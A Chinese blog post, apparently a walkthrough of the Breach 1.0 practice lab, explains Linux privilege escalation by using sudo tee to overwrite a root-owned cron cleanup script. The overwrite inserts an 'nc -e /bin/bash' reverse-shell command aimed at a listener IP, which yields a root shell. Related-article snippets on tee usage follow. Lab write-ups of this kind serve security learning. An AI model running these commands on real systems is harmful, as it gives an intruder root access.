linux tee命令 配合root权限不可写的 定时任务文件提权

最新推荐文章于 2024-05-08 21:19:04 发布
最新推荐文章于 2024-05-08 21:19:04 发布
阅读量386 收藏 1
点赞数 1
分类专栏: 提权 文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YouthBelief/article/details/122316987
版权

前言

Linux tee命令用于读取标准输入的数据,并将其内容输出成文件。

tee指令会从标准输入设备读取数据,将其内容输出到标准输出设备,同时保存成文件。

语法

tee [-ai][–help][–version][文件…]

参数:

-a或–append  附加到既有文件的后面,而非覆盖它.
-i或–ignore-interrupts  忽略中断信号。
–help  在线帮助。
–version  显示版本信息。

0x01实例

Breach 1.0 靶场

https://blog.csdn.net/YouthBelief/article/details/122299164

信息收集到

在这里插入图片描述
cd /usr/share/cleanup
cat tidyup.sh

比较可疑

在这里插入图片描述
发现是root文件,不过没有写入权限。
是一段清理脚本,描述中说明每3分钟执行清理,删除webapps目录下的文件,因此之前tomcat后台上传的马总是被删除,需要重新上传。

操作

(1) 向tidyup.sh中写入反弹shell命令

tidyup.sh文件只有root可写,而能够以root权限运行tee命令,那么用tee命令写tidyup.sh:先将反弹shell命令写入shell.txt文件,使用bash反弹shell命令没有成功,于是使用nc命令反弹shell成功,所以写nc反弹命令:

echo "nc -e /bin/bash 192.168.110.128 5555" > shell.txt

再使用tee命令将shell.txt内容输出到tidyup.sh

cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh

查看tidyup.sh文件写入成功:

cat /usr/share/cleanup/tidyup.sh

在这里插入图片描述

(2) nc监听等待反弹shell,查看权限是root。

在这里插入图片描述

LuckyCharm~
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Linux tee命令用法详解
01-09
Linux tee命令用于读取标准输入的数据,并将其内容输出成文件tee指令会从标准输入设备读取数据,将其内容输出到标准输出设备,同时保存成文件。 语法tee [-ai][--help][--version][文件...] 参数: -a或–append ...
linux权限不够tee,linuxtee命令无法正常工作(带有read和echo)
weixin_35307279的博客
05-03 736
脚本和输出如下:脚本:#!/bin/bash#tee_with_read.shfunction tee_test(){echo "***This should be printed first but it is not***"read -r -p "Enter input : "echo "You entered : $REPLY"}tee_test | tee -a logfile$./tee...
linux权限不够tee,Linux Tee命令
weixin_39639260的博客
05-03 892
Linux tee命令Linux tee命令与'cat'命令非常相似,只有一个区别。它将stdin放在stdout上,并将它们放入文件中。它是通过管道与其他命令一起使用最多的命令之一。它允许我们编从std输入到std输出的所有内容。 (可选)它供对一个或多个文件入。命令名称tee来自管道中使用的T分离器。句法:选项:以下是一些有用的选项,可以与tee命令一起使用,以使其更加具体:-a,–a...
linux 命令tee
路漫漫其修远兮 吾将上下而求索
01-10 1376
名称:tee 位置:/usr/bin/tee 权限:所有用户 作用:双向重定向,会同时将数据流送与文件和屏幕;而输出到屏幕的,就是stdout,可以让下一下命令继续处理。 用法:tee [OPTION]... [FILE]... 选项: -a, --append append to the given FILEs, do not overwrite 追加
Linux tee 的使用小结
tk1023的博客
09-30 469
Linux tee 命令用于读取标准输入的数据,并将其内容输出成文件tee 指令会从标准输入设备读取数据,将其内容输出到标准输出设备,同时保存成文件。 我们多用来进行日志的保存。用下面的 test.sh 可执行文件来进行演示。 [root@localhost ~]# cat test.sh #! /usr/bin/bash echo "hello world" for i in {1..3} do echo $i done [root@localhost ~]# tee.
Linuxtee命令的使用
系统运维
09-27 508
tee命令的作用像字母T一样,很形象的表示了它的功能:它把输出的一个副本输送到标准输出,另一个副本拷贝到相应的文件中。如果需要在输出到文件的同时,也把信息显示到屏幕上输出,那这个命令就再合适不过了。 一般格式如下: tee -a files -a选项表示追加到文件末尾。 如: [root@localhost practise]# who | tee who.log root :...
linux脚本中怎么退出tee模式,Linux Shell脚本入门:tee命令
weixin_34276402的博客
05-05 1884
用途说明 在执行Linux命令时,我们可以把输出重定向到文件中,比如 ls>a.txt,这时我们就不能看到输出了,如果我们既想把输出保存到文件中,又想在屏幕上看到输出内容,就可以使用tee命令了。tee命令读取标准输入,把这些内容同时输出到标准输出和(多个)文件中(readfrom standard input and write to standard output and files...
Linux常用命令汇总(不定时更新)
weixin_45769868的博客
12-04 869
d目录 –文件 l链接 b块设备 c字符设备owner/group/others rwx 可读可可执行 421。
限制linux用户执行命令,如何在Linux中限制用户命令
weixin_30415591的博客
05-07 1882
有很多不同的方法可以实现这一点。 我将列出几种可能的解决方案之一。我会建议使用几个不同的保护层来防止用户运行他们不应该被允许访问的命令。 这里的所有方向都假设用户有他们自己的/home/[username]目录,他们的shell是/bin/bash ,你希望他们在登录到系统时使用bash shell。1)更改目录权限,以便只有用户可以编辑其主目录的内容chmod 755 /home/[userna...
Linux安全之禁用特定命令
热门推荐
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
01-11 1万+
背景 操作 1、禁用普通用户su到root 2、禁用普通用户执行某些命令 3、禁用root执行某些命令和授sudo 1)禁止授普通用户sudo: chmod u+w /etc/sudoers 2)vi /etc/sudoers ,编辑sudoers文件,找到以下行: xxx ALL = (ALL) ALL ## 将xxx替换为允许sudo的普通用户名,后面,ALL,限制sudo执行的命令; 2)限制root执行某些命令 3)禁用内部命令 root下执行help可查看内部命令,然后执行:ena
Linux输出信息并将信息记录到文件tee命令
09-15
主要介绍了Linux中如何能在输出信息的同时把信息记录到文件的相关资料,文中主要使用的是tee命令,需要的朋友可以参考借鉴,下面来一起看看吧。
Linux tee命令使用详解
01-20
tee命令主要被用来向standout(标准输出流,通常是命令执行窗口)输出的同时也将内容输出到文件,下面是tee的man 信息 read from standard input and write to standard output and files 下面我们通过几个应用场景...
Linux】开始认识软硬链接
JLX_1的博客
04-29 3288
本文通过对文件系统的总结,讲解了Linux中的软硬链接
Linux网站服务
c5zm51zjr的博客
05-08 248
注:Discuz软件包安装2.5版本的,若没有需要去官网论坛上寻找,找到之后复制链接下载即可。网站架构:LAMP: Linux+Apache+MYSQL+PHP(系统+服务器程序+数据管理软件+中间软件)主配置文件:/etc/httpd/conf/httpd.conf。主目录:/var/www/html (源代码默认位置)子配置文件:/etc/httpd/conf.d/*注:网站a.org无需授,b.org需要授。网站:多个网页组合而成的一台网站服务器。URL:统一资源定位符,访问网站的地址。
2. Linux 基本指令(上)|ls|pwd|cd|tree|touch|mkdir|rmdir|rm
CoderZzz6310的博客
05-08 633
详细介绍了Linux的部分基础指令,ls,pwd,cd,tree,touch,mkdir,rmdir,rm
Linux 第二十三章
一怀明月的博客
05-08 510
回顾文件 fopen() fwrite fputs >文件名 追加重定向 认识系统接口 open linux中常见的函数传参数 umask write read 语言和系统的区别 文件描述符
Linux理解文件操作 && 文件描述符fd && 理解重定向 && dup2 && 缓冲区 && C语言实现自己的shell
喜欢C/C++/Linux/网络/数据库/数据结构
05-04 627
我们在平时使用的C/C++/Java的时候,我们所用的文件操作都是封装系统接口来进行供我们操作,我们在使用这些接口,本质上就是在访问硬件,也就是磁盘一个硬件设备是如何被函数接口的调用访问到的呢?当然是通过操作系统,操作系统是管理硬件设备的,在我们学的C/C++/Java等等语言所封装的文件操作接口,都必须通过操作系统的允许,才可以访问到磁盘这个硬件设备,而操作系统是不相信任何用户的,所以为了能够得到操作系统的允许,我们又必须供一些系统调用接口,供操作系统和用户打交道。
如何在 Ubuntu 22.04 或 20.04 Linux 上安装MobaXterm
最新发布
u010879745的博客
05-08 602
如何在 Ubuntu 22.04 或 20.04 Linux 上安装MobaXterm
tee linux 命令
06-08
Linux中的tee命令是一个常用的命令,它的作用是从标准输入中读取数据,然后将数据输出到标准输出和一个或多个文件中。tee命令的语法格式如下: ``` tee [OPTION]... [FILE]... ``` 其中,OPTION是可选参数,FILE是要输出数据的文件名,可以指定多个文件。一些常用的选项如下: - -a, --append:追加输出到文件,而不是覆盖。 - -i, --ignore-interrupts:忽略中断信号。 - -p, --output-error=warn:当文件出错时,不输出错误信息。 tee命令的一些使用示例: 1. 将标准输入输出到文件和标准输出: ``` command | tee file.txt ``` 2. 将标准输入输出到多个文件: ``` command | tee file1.txt file2.txt ``` 3. 追加输出到文件: ``` command | tee -a file.txt ``` 4. 忽略中断信号: ``` command | tee -i file.txt ``` 这些示例只是tee命令的一些常见用法,更多详细的使用方法和示例可以通过man tee命令或者网上搜索获得。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值